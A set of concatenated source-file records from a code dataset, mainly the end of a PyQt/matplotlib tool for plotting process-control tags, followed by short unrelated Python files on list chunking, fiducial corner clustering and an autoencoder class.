@QtCore.pyqtSlot()\r\n def home_zoom(self):\r\n '''\r\n Sets the zoom level to default.\r\n '''\r\n if DEBUG:\r\n print('PlotManager::home_clicked()')\r\n\r\n try:\r\n #plt.margins(0,0.05)\r\n if len(self._plotinfo) > 0:\r\n for pi in self._plotinfo:\r\n pi.ax.autoscale(axis='x',tight=True)\r\n pi.ax.autoscale(axis='y',tight=False)\r\n self.plot_window.canvas.draw()\r\n\r\n \r\n \r\n except Exception as e:\r\n sys.stderr.write(e)\r\n\r\n @QtCore.pyqtSlot()\r\n def clear_all_plots(self):\r\n if DEBUG:\r\n print('PlotManager::clear_all_plots()')\r\n\r\n try:\r\n \r\n # Clear plot info for all tags (not just the ones that are known to\r\n # be plotted\r\n for t in self._taginfo:\r\n self._taginfo[t].plotinfo = None\r\n \r\n '''\r\n while len(self._plotinfo) > 0:\r\n p = self._plotinfo.pop()\r\n for t in p.tagnames:\r\n self._taginfo[t].plotinfo = None\r\n '''\r\n \r\n self._plotinfo.clear()\r\n self._groupid_plots.clear()\r\n self.plot_window.fig.clear()\r\n self.plot_window.toolbar._nav_stack.clear()\r\n self.plot_window.canvas.draw()\r\n except Exception as e:\r\n sys.stderr.write(e)\r\n \r\n\r\n \r\n @QtCore.pyqtSlot()\r\n def refresh(self):\r\n try:\r\n if DEBUG:\r\n print(\"PlotManager::refresh()\")\r\n\r\n for pi in self._plotinfo:\r\n self.replot(pi)\r\n\r\n self.plot_window.toolbar._nav_stack.clear()\r\n self.plot_window.fig.tight_layout()\r\n self.plot_window.canvas.draw()\r\n except Exception as e:\r\n sys.stderr.write(e)\r\n\r\n def replot(self,plotinfo,save_xlim=False):\r\n '''\r\n Replot the ax in plotinfo. Used when adding/removing tags\r\n '''\r\n if DEBUG:\r\n print(\"PlotManager::replot()\")\r\n\r\n if save_xlim:\r\n if DEBUG:\r\n print(\"Saving xlim\")\r\n xlim = plotinfo.ax.get_xlim()\r\n\r\n plotinfo.ax.clear()\r\n\r\n #color = [ self._taginfo[t].color for t in plotinfo.tagnames ]\r\n for tagname in plotinfo.tagnames:\r\n plotinfo.ax.plot(\r\n self._df[tagname],\r\n color=self._taginfo[tagname].color,\r\n label=tagname,\r\n )\r\n plotinfo.ax.legend(loc=self.legend_loc,\r\n fontsize=self.legend_fontsize)\r\n\r\n if save_xlim:\r\n plotinfo.ax.set_xlim(xlim)\r\n else:\r\n plotinfo.ax.autoscale(axis='x',tight=True)\r\n\r\n\r\n\r\n def add_plot(self,tag):\r\n taginfo = self._taginfo[tag]\r\n\r\n if taginfo.plotinfo != None:\r\n sys.stderr.write(\"Tag {} already plotted.\\n\".format(tag))\r\n return\r\n\r\n # check if the groupid has a trend\r\n # but only if groupid is not None\r\n groupid = taginfo.groupid\r\n if groupid and groupid in self._groupid_plots.keys():\r\n # add trend to existing axis\r\n plotinfo = self._groupid_plots[groupid]\r\n plotinfo.tagnames.append(tag)\r\n taginfo.plotinfo = plotinfo\r\n\r\n # Only plot new tag so that zoom doesn't change\r\n if DEBUG:\r\n print(\"Adding tag to axis\")\r\n\r\n #xlim = plotinfo.ax.get_xlim()\r\n\r\n plotinfo.ax.plot(\r\n self._df[tag],\r\n color=taginfo.color,\r\n label=tag,\r\n scalex=False,\r\n )\r\n plotinfo.ax.legend(loc=self.legend_loc,\r\n fontsize=self.legend_fontsize)\r\n '''\r\n self._df[tag].plot(color=taginfo.color,\r\n ax=plotinfo.ax,\r\n legend=True,\r\n include_bool=True)\r\n '''\r\n\r\n #plotinfo.ax.set_xlim(xlim)\r\n\r\n else:\r\n nplots = len(self._plotinfo)\r\n\r\n # make a new trend\r\n if nplots > 0:\r\n sharex = self._plotinfo[0].ax\r\n else:\r\n sharex = None\r\n\r\n # resize existing axes\r\n if DEBUG:\r\n print(\"Resize existing axes\")\r\n gs = matplotlib.gridspec.GridSpec(nplots+1,1)\r\n for i in range(nplots):\r\n self._plotinfo[i].ax.set_position( gs[i].get_position(self.plot_window.fig) )\r\n self._plotinfo[i].ax.set_subplotspec( gs[i] )\r\n\r\n if DEBUG:\r\n print(\"Create new axes\")\r\n ax = self.plot_window.fig.add_subplot(\r\n nplots+1,1,nplots+1,\r\n label=groupid,\r\n sharex=sharex\r\n )\r\n\r\n if DEBUG:\r\n print(\"label_outer for all other axis\")\r\n for pi in self._plotinfo:\r\n pi.ax.tick_params(labelbottom=False)\r\n\r\n\r\n plotinfo = PlotInfo(tag,groupid,ax)\r\n self._plotinfo.append(plotinfo)\r\n self._taginfo[tag].plotinfo = plotinfo\r\n if groupid:\r\n self._groupid_plots[groupid] = plotinfo\r\n\r\n \r\n if DEBUG:\r\n print(\"Replotting new axis\")\r\n\r\n self.replot(plotinfo,save_xlim=(sharex!=None))\r\n\r\n if DEBUG:\r\n print(\"Clearing navstack\")\r\n self.plot_window.toolbar._nav_stack.clear()\r\n\r\n self.cur = MultiCursor(\r\n self.plot_window.fig.canvas,\r\n [ pi.ax for pi in self._plotinfo ],\r\n lw=1,\r\n color='red')\r\n\r\n\r\n def remove_plot(self,tag):\r\n taginfo = self._taginfo[tag]\r\n plotinfo = taginfo.plotinfo\r\n if plotinfo == None:\r\n sys.stderr.write(\"Tag {} is not plotted.\\n\".format(tag))\r\n return\r\n\r\n # check if there are other plots in group\r\n if len(plotinfo.tagnames) > 1:\r\n # remove only one line\r\n plotinfo.tagnames.remove(tag)\r\n if DEBUG:\r\n print(\"Removing one variable from list\")\r\n print(\"Remaining tags:\")\r\n print(plotinfo.tagnames)\r\n\r\n self.replot(plotinfo,save_xlim=True)\r\n\r\n else:\r\n # remove whole axes\r\n if DEBUG:\r\n print(\"Removing axis\")\r\n plotinfo.ax.remove()\r\n\r\n self._plotinfo.remove(plotinfo)\r\n\r\n if taginfo.groupid in self._groupid_plots:\r\n del self._groupid_plots[taginfo.groupid] \r\n\r\n nplots = len(self._plotinfo)\r\n if nplots > 0:\r\n gs = matplotlib.gridspec.GridSpec(nplots,1)\r\n for i in range(nplots):\r\n self._plotinfo[i].ax.set_position( gs[i].get_position(self.plot_window.fig) )\r\n self._plotinfo[i].ax.set_subplotspec( gs[i] )\r\n\r\n if len(self._plotinfo) == 0:\r\n if DEBUG:\r\n print(\"no more plots left\")\r\n self.plot_window.toolbar._nav_stack.clear()\r\n self.cur = None\r\n \r\n else:\r\n self.cur = MultiCursor(\r\n self.plot_window.fig.canvas,\r\n [ pi.ax for pi in self._plotinfo ],\r\n lw=1,\r\n color='red')\r\n\r\n self._plotinfo[-1].ax.tick_params(labelbottom=True)\r\n\r\n\r\n\r\n taginfo.plotinfo = None\r\n\r\n\r\n @QtCore.pyqtSlot(str,bool)\r\n def add_remove_plot(self,tag,add):\r\n '''\r\n Add/Remove a plot.\r\n\r\n Parameters:\r\n -----------\r\n tag : str\r\n column in dataframe to plot\r\n add : bool\r\n True = add plot, False = remove plot\r\n '''\r\n\r\n if DEBUG:\r\n print(\"PlotManager::add_remove_plot({},{})\".format(tag,add))\r\n\r\n try:\r\n if add:\r\n self.add_plot(tag)\r\n else:\r\n self.remove_plot(tag)\r\n\r\n self.plot_window.canvas.draw()\r\n except Exception as e:\r\n sys.stderr.write('Exception in QtSlot PlotManager::add_remove_plot\\n' \\\r\n + str(e) + '\\n')\r\n\r\n\r\n @QtCore.pyqtSlot()\r\n def showme(self):\r\n '''\r\n Show python code to generate the current figure.\r\n '''\r\n\r\n nrows = len(self._plotinfo)\r\n code = ''\r\n\r\n if nrows > 0:\r\n # Create a copy of the dataframe with only displayed data\r\n # instead of setting xlimits. to plot faster.\r\n\r\n # xlimit based on first axes, the rest should be the same\r\n # this code is only executed if there is at least one plot\r\n \r\n if ( type(self._df.index) != pandas.DatetimeIndex):\r\n code += \"df_plot = df\\n\"\r\n else:\r\n xlim = self._plotinfo[0].ax.get_xlim()\r\n x0 = matplotlib.dates.num2date(xlim[0]).strftime('%Y-%m-%d %H:%M')\r\n x1 = matplotlib.dates.num2date(xlim[1]).strftime('%Y-%m-%d %H:%M')\r\n code += \"df_plot = df['\" + x0 + \"':'\" + x1 + \"']\\n\"\r\n\r\n code += 'fig,ax = plt.subplots(nrows={},sharex=True)\\n'.format(nrows)\r\n\r\n i = 0 \r\n for plotinfo in self._plotinfo:\r\n color = []\r\n for tag in plotinfo.tagnames:\r\n color.append( self._taginfo[tag].color )\r\n\r\n ylim = plotinfo.ax.get_ylim()\r\n\r\n code += 'df_plot.plot(\\n' + \\\r\n ' y={},\\n'.format(plotinfo.tagnames) + \\\r\n ' color={},\\n'.format(color) + \\\r\n ' ylim={},\\n'.format(ylim)\r\n\r\n if nrows > 1:\r\n code += ' ax=ax[{}],\\n'.format(i)\r\n else:\r\n code += ' ax=ax,\\n'\r\n \r\n code += ')\\n'\r\n\r\n i += 1\r\n\r\n if type(self.legend_loc) == str:\r\n loccode = \"loc='{}'\".format(self.legend_loc)\r\n else:\r\n loccode = \"loc={}\".format(self.legend_loc)\r\n if type(self.legend_fontsize) == str:\r\n fontcode = \"fontsize='{}'\".format(self.legend_fontsize)\r\n else:\r\n fontcode = \"fontsize={}\".format(self.legend_fontsize)\r\n\r\n code += \"for a in ax:\\n a.legend({},{})\\n\".format(\r\n loccode,fontcode)\r\n code += 'fig.tight_layout()\\n'\r\n\r\n #print(code)\r\n pyperclip.copy(code)\r\n\r\n code = (\"The following is copied to your clipboard:
    \"\r\n + code.replace('\\n','
    ').replace(\" \",' ') )\r\n\r\n QMessageBox.information(None, \"Show Me\",\r\n code,\r\n QMessageBox.Ok, QMessageBox.Ok)\r\n\r\n\r\n \r\n\r\n \r\nclass PlotWindow(QWidget):\r\n '''\r\n A single plot window.\r\n\r\n '''\r\n\r\n # signal is emitted when home is clicked but navstack\r\n # is empty\r\n home_zoom_signal = QtCore.Signal()\r\n \r\n\r\n def __init__(self,parent=None):\r\n QWidget.__init__(self,parent)\r\n\r\n self.fig = plt.figure()\r\n self.canvas = FigCanvas(self.fig)\r\n self.toolbar = NavBar(self.canvas,self)\r\n\r\n layout = QVBoxLayout()\r\n layout.addWidget(self.toolbar)\r\n layout.addWidget(self.canvas)\r\n self.setLayout(layout)\r\n\r\n # find toolbar's home button\r\n home_action = None\r\n for action in self.toolbar.actions():\r\n if action.text() == 'Home':\r\n home_action = action\r\n break\r\n\r\n if home_action == None:\r\n sys.stderr.write('Home action in Qt Navbar not found')\r\n else:\r\n home_action.triggered.connect(self.home_clicked)\r\n\r\n @QtCore.pyqtSlot()\r\n def home_clicked(self):\r\n self.home_zoom_signal.emit()\r\n self.toolbar._nav_stack.clear()\r\n \r\n\r\n\r\n\r\nclass ToolPanel(QWidget):\r\n '''\r\n Widget that contains all the plotting tools.\r\n\r\n\r\n Signals:\r\n --------\r\n showme_clicked\r\n Show Me button clicked\r\n '''\r\n\r\n showme_clicked = QtCore.Signal()\r\n clear_click_signal = QtCore.Signal()\r\n refresh_click_signal = QtCore.Signal()\r\n\r\n def __init__(self,parent=None):\r\n QWidget.__init__(self,parent)\r\n self._tools = []\r\n\r\n showme_button = QPushButton('Show Me')\r\n showme_button.clicked.connect(self.showme_clicked)\r\n\r\n clear_button = QPushButton(\"Clear\")\r\n clear_button.clicked.connect(self.clear_clicked)\r\n\r\n refresh_button = QPushButton(\"Refresh\")\r\n refresh_button.clicked.connect(self.refresh_click_signal)\r\n\r\n self.filter_textbox = QLineEdit()\r\n self.filter_textbox.textChanged.connect(self.filter_changed)\r\n\r\n\r\n # scroll_area is the scroll area that\r\n # will contain all the tools\r\n scroll_area = QScrollArea(self)\r\n scroll_area.setWidgetResizable(True)\r\n scroll_area.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)\r\n\r\n # scroll_widget is the widget in the scroll area\r\n scroll_widget = QWidget(scroll_area)\r\n scroll_area.setWidget(scroll_widget)\r\n\r\n # scroll_layout is the scroll area layout, it contains\r\n # tool_layout where all the tools are and a bit of stretch\r\n # tool_layout is saved so you can add tools to it later\r\n self.tool_layout = QVBoxLayout()\r\n self.tool_layout.setContentsMargins(0,0,0,0)\r\n self.tool_layout.setSpacing(0)\r\n scroll_layout = QVBoxLayout()\r\n scroll_layout.setContentsMargins(0,0,0,0)\r\n scroll_layout.setSpacing(0)\r\n scroll_layout.addLayout(self.tool_layout)\r\n scroll_layout.addStretch(1)\r\n\r\n scroll_widget.setLayout(scroll_layout)\r\n\r\n main_layout = QVBoxLayout()\r\n main_layout.setContentsMargins(0,0,0,0)\r\n main_layout.setSpacing(0)\r\n main_layout.addWidget(showme_button)\r\n main_layout.addWidget(clear_button)\r\n main_layout.addWidget(self.filter_textbox)\r\n main_layout.addWidget(scroll_area)\r\n main_layout.addWidget(refresh_button)\r\n self.setLayout(main_layout)\r\n\r\n def add_tagtools(self,tagtools):\r\n for t in tagtools:\r\n self._tools.append(t)\r\n self.tool_layout.addWidget(t)\r\n\r\n assert t.parent() != None, 'tagtool has no parent'\r\n\r\n def remove_tagtools(self):\r\n while True:\r\n try:\r\n tool = self._tools.pop()\r\n tool.setParent(None)\r\n except IndexError:\r\n break\r\n\r\n\r\n @QtCore.pyqtSlot(str)\r\n def filter_changed(self,filter_text):\r\n for tool in self._tools:\r\n if filter_text.lower() in tool.name.lower():\r\n tool.show()\r\n else:\r\n tool.hide()\r\n\r\n @QtCore.pyqtSlot()\r\n def clear_clicked(self):\r\n if DEBUG:\r\n print(\"ToolPanel::clear_clicked\")\r\n\r\n ans = QMessageBox.question(\r\n None,\r\n \"Confirm clear\",\"Are you sure you want to clear all plots?\"\r\n )\r\n if (ans != QMessageBox.Yes):\r\n if DEBUG:\r\n print(\"Didn't click yes on the messagebox\")\r\n return\r\n\r\n for tool in self._tools:\r\n try:\r\n tool.reset()\r\n except Exception as e:\r\n sys.stderr.write(e)\r\n\r\n if DEBUG:\r\n print(\"Emit clear clicked\")\r\n self.clear_click_signal.emit()\r\n \r\n\r\n\r\nclass TagTool(QWidget):\r\n '''\r\n A Widget that contain buttons to add tags to trends\r\n\r\n Signals:\r\n --------\r\n add_remove_plot : QtCore.Signal(str,bool)\r\n Signal to add/remove a plot from a plot window.\r\n '''\r\n\r\n add_remove_plot = QtCore.Signal(str,bool)\r\n\r\n def __init__(self,name):\r\n '''\r\n Constructing a tool also adds it to its parent ToolPanel's layout\r\n\r\n Parameters:\r\n -----------\r\n name : str\r\n tagname\r\n parent_toollist : ToolPanel\r\n Qt parent, this tool is also added to the toollist's layout\r\n\r\n '''\r\n QWidget.__init__(self)\r\n\r\n self.name = name\r\n self.plot_button = QPushButton(name)\r\n self.plot_button.setCheckable(True)\r\n self.plot_button.toggled.connect(self.plot_clicked)\r\n\r\n layout = QHBoxLayout()\r\n layout.setContentsMargins(0,0,0,0)\r\n layout.setSpacing(0)\r\n layout.addWidget(self.plot_button,1)\r\n\r\n self.setLayout(layout)\r\n\r\n\r\n @QtCore.pyqtSlot(bool)\r\n def plot_clicked(self,is_clicked):\r\n self.add_remove_plot.emit(self.name,is_clicked)\r\n\r\n def reset(self):\r\n self.blockSignals(True)\r\n self.plot_button.setChecked(False)\r\n self.blockSignals(False)\r\n\r\ndef add_grouping_rule(expr,color=None,sub=r'\\1',top=True):\r\n '''\r\n Add a rule to group trends.\r\n\r\n Each tag (column in dataframe) is passed through a regular expression\r\n defined in each rule. When a rule expression matches the tag, then the tag groupid and color is set\r\n as specified by the rule. Tags with the same groupid is plotted on the same\r\n axis.\r\n\r\n The regular expressions are evaluated by the 're' library. It is advised to\r\n set expr and sub as raw strings.\r\n\r\n Some defaults are configured already, try to run print_grouping_rules to see\r\n all the defined rules.\r\n\r\n Examples:\r\n ---------\r\n\r\n Example 1:\r\n The default is to return the first regex group as the groupid. This example\r\n returns a tag's stem as the groupid for SP and PV (note OP is not part of\r\n the group\r\n\r\n expr: r'(.*)\\.PV'\r\n color: 'blue'\r\n sub: r'\\\\1' (default)\r\n \r\n expr: r'(.*)\\.SP'\r\n color: 'yellow'\r\n sub: r'\\\\1' (default)\r\n \r\n\r\n Example 2:\r\n If you want to trend experion tags in the same group:\r\n\r\n expr: r'(.*)\\.(DACA|PIDA)\\.PV'\r\n color: 'blue'\r\n sub: r'\\\\1' (default)\r\n\r\n expr: r'(.*)\\.(DACA|PIDA)\\.SP'\r\n color: 'yellow'\r\n sub: r'\\\\1' (default)\r\n\r\n\r\n Example 3:\r\n Suppose you have indicators e.g. 00TI1234 that would be the PV of e.g.\r\n 00TC1234.SP. In this example, the groupid is set to 00TC1234 for both the\r\n TI and the TC. You need to make use of the substitute string because the\r\n first re group is not the groupid.\r\n\r\n expr: r'([0-9]{2,}.)I([0-9]{4,})'\r\n sub: r'\\\\1C\\\\2'\r\n color: 'blue'\r\n\r\n expr: r'([0-9]{2,}.)C([0-9]{4,})\\.SP'\r\n sub: r'\\\\1C\\\\2'\r\n color: 'blue'\r\n\r\n tag groupid\r\n ------------------------------\r\n 00TI1234 00TC1234\r\n 00TC1234.SP 00TC1234\r\n 11TC1234.OP None\r\n 22FI1001 22FC1234\r\n 22FC5005.SP 22FC5005\r\n 33AI1111 33AC1111\r\n\r\n\r\n \r\n\r\n Parameters:\r\n -----------\r\n expr : str\r\n regular expression to evaluate\r\n color : str\r\n matplotlib color of trend where tag matches expr\r\n sub : str, optional\r\n regular expression replacement str to return groupid. Default is r'\\\\1'\r\n which returns the first group in expr. If set to None, then a groupid\r\n of None is returned (tag is ungrouped).\r\n top : bool, optional\r\n Set to false to add rule to bottom of rule list. Default is to add\r\n rules to bottom of rule list, the first rule that evaluates is used.\r\n\r\n '''\r\n\r\n if top:\r\n TagInfo.taginfo_rules.insert(0,\r\n TagInfoRule(expr,color,sub)\r\n )\r\n else:\r\n TagInfo.taginfo_rules.append(\r\n TagInfoRule(expr,color,sub)\r\n )\r\n\r\ndef remove_grouping_rules(index=None):\r\n '''\r\n Remove grouping rules.\r\n Note: Rules are only applied when the dataframe is set, you need to set the\r\n dataframe again for this change to apply.\r\n\r\n Parameters:\r\n -----------\r\n index : int, optional\r\n Index of rule to remove. If None, clear all the grouping rules.\r\n\r\n '''\r\n global _isInit\r\n\r\n if _isInit:\r\n print(\"Warning: changing the grouping rules will not have an effect\",\r\n \"until you call set_dataframe() again.\")\r\n if index == None:\r\n TagInfo.taginfo_rules.clear()\r\n else:\r\n TagInfo.taginfo_rules.pop(index)\r\n\r\ndef print_grouping_rules():\r\n '''\r\n Print all grouping rules.\r\n '''\r\n print(\"{:<3} {:<60} {:^10} {}\".format(\"\",\"expr\",\"color\",\"sub\"))\r\n print(\"{:->80}\".format(''))\r\n for i in range(len(TagInfo.taginfo_rules)):\r\n rule = TagInfo.taginfo_rules[i]\r\n if rule.sub == None:\r\n sub = 'None'\r\n else:\r\n sub = rule.sub\r\n if rule.color == None:\r\n col = 'None'\r\n else:\r\n col = rule.color\r\n print(\"{:<3} {:<60} {:^10} {}\"\\\r\n .format(i, rule.expr, col, sub )\r\n )\r\n\r\ndef load_grouping_template(template):\r\n '''\r\n Load a preconfigured grouping rule template instead of configuring grouping\r\n rules manually. \r\n\r\n Templates\r\n ---------\r\n ProfCon : Honeywell Profit Controller history\r\n - Groups .READVALUE, .HIGHLIMIT, .LOWLIMIT, .SSVALUE, .UNBIASEDMODELPV\r\n per tag\r\n - Groups .CONSTRAINTTYPE and .STATUS for MVs and CVs\r\n DMC : Aspentech DMC plus history\r\n - Groups .ULINMD .LLINDM .VIND .SSMAN .LDEPTG .UDEPTG .SSDEP per tag\r\n - Groups .SRVDEP for all tags\r\n - Groups .SRIIND for all tags\r\n - Groups .CSIDEP for all tags\r\n - Groups .CSIIND for all tags\r\n\r\n\r\n Parameters\r\n ----------\r\n template : string\r\n String to define template.\r\n '''\r\n\r\n global _isInit\r\n\r\n if _isInit:\r\n print(\"Warning: changing the grouping rules will not have an effect\",\r\n \"until you call set_dataframe() again.\")\r\n \r\n\r\n\r\n if template == 'ProfCon':\r\n add_grouping_rule(r'(.*)\\.READVALUE','C0')\r\n add_grouping_rule(r'(.*)\\.HIGHLIMIT','red')\r\n add_grouping_rule(r'(.*)\\.LOWLIMIT','red')\r\n add_grouping_rule(r'(.*)\\.SSVALUE','cyan')\r\n add_grouping_rule(r'(.*)\\.UNBIASEDMODELPV','purple')\r\n add_grouping_rule(r'(.*)(CV|MV)[0-9]{1,2}\\.CONSTRAINTTYPE',sub=r'\\2_CONSTRAINTTYPE')\r\n add_grouping_rule(r'(.*)(CV|MV)[0-9]{1,2}\\.STATUS',sub=r'\\2_STATUS')\r\n elif template == 'DMC':\r\n # DMC has catch-all at bottom of list because .VIND and .DEP are not marked.\r\n add_grouping_rule(r'(.*)','C0',top=False)\r\n\r\n # MV Parameters\r\n add_grouping_rule(r'(.*)\\.ULINDM','red')\r\n add_grouping_rule(r'(.*)\\.LLINDM','red')\r\n add_grouping_rule(r'(.*)\\.SSMAN','cyan')\r\n add_grouping_rule(r'(.*)\\.ETMV','lightgreen')\r\n add_grouping_rule(r'(.*)\\.VINDSP','gray')\r\n\r\n # CV Parameters\r\n add_grouping_rule(r'(.*)\\.UDEPTG','red')\r\n add_grouping_rule(r'(.*)\\.LDEPTG','red')\r\n add_grouping_rule(r'(.*)\\.SSDEP','cyan')\r\n add_grouping_rule(r'(.*)\\.ETCV','lightgreen')\r\n add_grouping_rule(r'(.*)\\.PRDMDLD','magenta')\r\n\r\n # Ramp Parameters\r\n add_grouping_rule(r'(.*).LRDPTG','red',r'\\1_RAMP')\r\n add_grouping_rule(r'(.*).URDPTG','red',r'\\1_RAMP')\r\n add_grouping_rule(r'(.*).SSRDEP','cyan',r'\\1_RAMP')\r\n add_grouping_rule(r'(.*).RAMPSP','yellow')\r\n\r\n # Generic Variable parameters: e.g. plot all CV statuses on the same\r\n # trend\r\n add_grouping_rule(r'(.*)\\.SRVDEP',sub='SRVDEP')\r\n add_grouping_rule(r'(.*)\\.SRIIND',sub='SRIIND')\r\n add_grouping_rule(r'(.*)\\.CSIDEP',sub='CSIDEP')\r\n add_grouping_rule(r'(.*)\\.CSIIND',sub='CSIIND')\r\n\r\n \r\n else:\r\n print(\"Unknown template {}\".format(template))\r\n\r\n \r\ndef set_legend_fontsize(size):\r\n '''\r\n Parameters:\r\n -----------\r\n size : int or {'xx-small', 'x-small', 'small', 'medium', 'large', 'x-large', 'xx-large'}\r\n font size that can be passed to a matplotlib axes.legend function\r\n\r\n '''\r\n plot_manager.legend_fontsize = size\r\ndef set_legend_loc(loc):\r\n '''\r\n Parameters:\r\n -----------\r\n loc : int or string\r\n legend location that can be passed to matplotlib axes.legend function.\r\n =============== =============\r\n Location String Location Code\r\n =============== =============\r\n 'best' 0\r\n 'upper right' 1\r\n 'upper left' 2\r\n 'lower left' 3\r\n 'lower right' 4\r\n 'right' 5\r\n 'center left' 6\r\n 'center right' 7\r\n 'lower center' 8\r\n 'upper center' 9\r\n 'center' 10\r\n =============== =============\r\n '''\r\n plot_manager.legend_loc = loc\r\n\r\ndef set_dataframe(df):\r\n '''\r\n Set the dataframe to use for plotting.\r\n\r\n The dataframe must be set before the tool will work.\r\n\r\n Parameters:\r\n -----------\r\n df : pandas.core.frame.DataFrame\r\n Dataframe to plot\r\n '''\r\n global _isInit\r\n global _df\r\n global main_window\r\n global tool_panel\r\n global plot_window\r\n global plot_manager\r\n\r\n # Check if dataframe has datetime index, this is not required but a\r\n # worthwhile error check\r\n if type(df.index) != pandas.DatetimeIndex:\r\n sys.stderr.write(\"WARNING: Dataframe does not have a datetime index\\n\")\r\n\r\n if _isInit:\r\n tool_panel.remove_tagtools()\r\n\r\n plot_manager.set_dataframe(df)\r\n tool_panel.add_tagtools( plot_manager.get_tagtools() )\r\n\r\n _isInit = True\r\n\r\n\r\ndef show():\r\n '''\r\n Show the plot window.\r\n '''\r\n global main_window\r\n global _isInit\r\n global _execApp\r\n\r\n if not _isInit:\r\n sys.stderr.write('Dataframe is not initialised, use set_dataframe to'\r\n +' initialise dataframe\\n')\r\n return\r\n\r\n main_window.show()\r\n\r\n if DEBUG:\r\n print(\"Showing main window\")\r\n\r\n if _execApp:\r\n app.exec_()\r\n app.exit()\r\n\r\ndef set_exec_on_show(on=True):\r\n '''\r\n Set whether Qt app .exec function should be called on show(). When\r\n proc_plot is used in a jupyter notebook with %matplotlib qt magic then the\r\n gui loop is already running and starting it again will break the app.\r\n proc_plot tries to figure it out automatically but you can override the\r\n setting with this function.\r\n\r\n Parameters:\r\n -----------\r\n on : bool, optional\r\n set to False to disable runnnig app.exec.\r\n\r\n '''\r\n global _execApp\r\n _execApp = on\r\n\r\n_isInit = False # has the window been initialised with a dataframe?\r\n_execApp = True # if started with qt, gui loop is running\r\n\r\nif DEBUG:\r\n print(\"Backend: \", plt.get_backend())\r\n\r\nif (plt.get_backend().lower() == 'qt5agg' and\r\n plt.isinteractive() ):\r\n # looks like you are running a jupyter notebook with %matplotlib qt\r\n _execApp = False\r\n print(\"It looks like you are running a jupyter notebook with \" \\\r\n +\"%matplotlib qt magic.\\nThe gui loop is disabled, if you \" \\\r\n +\"want to enable it, use proc_plot.set_exec_on_show()\")\r\n\r\napp = QtCore.QCoreApplication.instance()\r\nif app is None:\r\n app = QApplication([])\r\n if DEBUG:\r\n print(\"app was None\")\r\n\r\ninteractive = plt.isinteractive()\r\nif interactive:\r\n plt.ioff()\r\n\r\nmain_window = QWidget()\r\nplot_manager = PlotManager(main_window)\r\ntool_panel = ToolPanel(main_window)\r\n\r\ntool_panel.showme_clicked.connect(plot_manager.showme)\r\ntool_panel.clear_click_signal.connect(plot_manager.clear_all_plots)\r\ntool_panel.refresh_click_signal.connect(plot_manager.refresh)\r\n\r\nlayout = QHBoxLayout()\r\nlayout.addWidget(tool_panel,0)\r\nlayout.addWidget(plot_manager.plot_window,1)\r\nmain_window.setLayout(layout)\r\n#del layout\r\n\r\n\r\nif interactive:\r\n plt.ion()\r\n","repo_name":"fpieterse/proc_plot","sub_path":"proc_plot/pp.py","file_name":"pp.py","file_ext":"py","file_size_in_byte":33248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"29489744399","text":"# 切割串列,根据指定的长度切成好几块\ndef group(iterable,size):\n result = []\n li = list(iterable)#将可迭代者转成list\n length=len(li)\n for i in range(0,length,size):#一你要的长度开始迭带到最大长度\n result.append(li[i:i+size])#加入可迭代者串列的长度个数,如果最后小于所需长度,全部加入\n return result\n\nif __name__ == '__main__':\n lst = [4,8,9,5,7,2,1,7,4,9]\n print(group(lst,4))\n tup = (4,8,9,5,7,2,1,7,4,9)\n print(group(tup,4))\n","repo_name":"CYCEvans/PYTHON_yehnan","sub_path":"CH4/ch04_group.py","file_name":"ch04_group.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"35403526385","text":"#!/usr/bin/env python\nimport numpy as np\nfrom template_0.slid_win import sliding_windows\nfrom process import shi_tomasi\nfrom refinement import refinement_axial\nfrom sklearn.cluster import DBSCAN\n\ndef template2(img):\n return shi_tomasi(img, maxCorners=10, qualityLevel=0.25)\n\ndef god_function(list_axial, list_coronal, list_sagittal): \n length = len(list_axial)\n\n corners = []\n for z in range(63, length):\n if z in range(90, 111):\n continue\n shi = template2(list_axial[z])\n corners.extend([list(corn) + [z] for corn in shi])\n\n #print(\"Refining...\")\n #raw = refinement_axial(corners, list_axial.shape[::-1], mode='soft')\n raw = corners\n print(\"Clustering...\")\n clust = DBSCAN(eps=50, leaf_size=14, min_samples=1)\n predictions = clust.fit_predict(raw)\n labels = set(predictions)\n final = []\n for label in list(labels):\n centroid = [0, 0, 0]\n count = 0\n for i in range(len(raw)):\n if predictions[i] == label:\n count += 1\n centroid[0] += raw[i][0]\n centroid[1] += raw[i][1]\n centroid[2] += raw[i][2]\n centroid[0] /= count\n centroid[1] /= count\n centroid[2] /= count\n final.append(centroid)\n return final\n\n","repo_name":"rharish101/Fiducial","sub_path":"final_python.py","file_name":"final_python.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"69981750495","text":"from tensorflow import keras\n\nfrom .base import BaseAutoEncoder\n\n\nclass AutoEncoder(BaseAutoEncoder):\n def __init__(\n self,\n input_shape=(128, 128, 3),\n z_dim=64,\n encoder_weights_path=None,\n decoder_weights_path=None,\n autoencoder_weights_path=None,\n ):\n\n self.input_shape = input_shape\n self.n_channels = input_shape[-1]\n self.z_dim = z_dim\n\n self.encoder = self.build_encoder()\n self.decoder = self.build_decoder()\n\n if encoder_weights_path is not None:\n self.encoder.load_weights(encoder_weights_path)\n\n if decoder_weights_path is not None:\n self.decoder.load_weights(decoder_weights_path)\n\n self.model = self.build_autoencoder()\n\n if autoencoder_weights_path is not None:\n self.model.load_weights(autoencoder_weights_path)\n self.predict = self.predict_autoencoder\n else:\n self.predict = self.predict_encoder_decoder\n\n self.autoencoder = self.model\n","repo_name":"isaaccorley/Privacy-Encoder","sub_path":"privacy_encoder/models/autoencoder.py","file_name":"autoencoder.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"36755124956","text":"from twisted.internet import defer, threads\nfrom twisted.web import server\nfrom txjsonrpc.web import jsonrpc\nfrom txjsonrpc.web.jsonrpc import Proxy\nfrom twisted.python import log\n\nimport jsonpickle, sqlite3, cPickle\nimport Queue\n\nfrom core.utils import RetVal\nfrom core.topology import Topology\nfrom core.templatedef import TemplateDefinition\nfrom core.templateins import TemplateInstance\nfrom core.templaterun import TemplateRun\nfrom core.returnvalue import *\nfrom core.block import VariableInfo, BlockInfo\nfrom core.comphandler import *\n\nclass 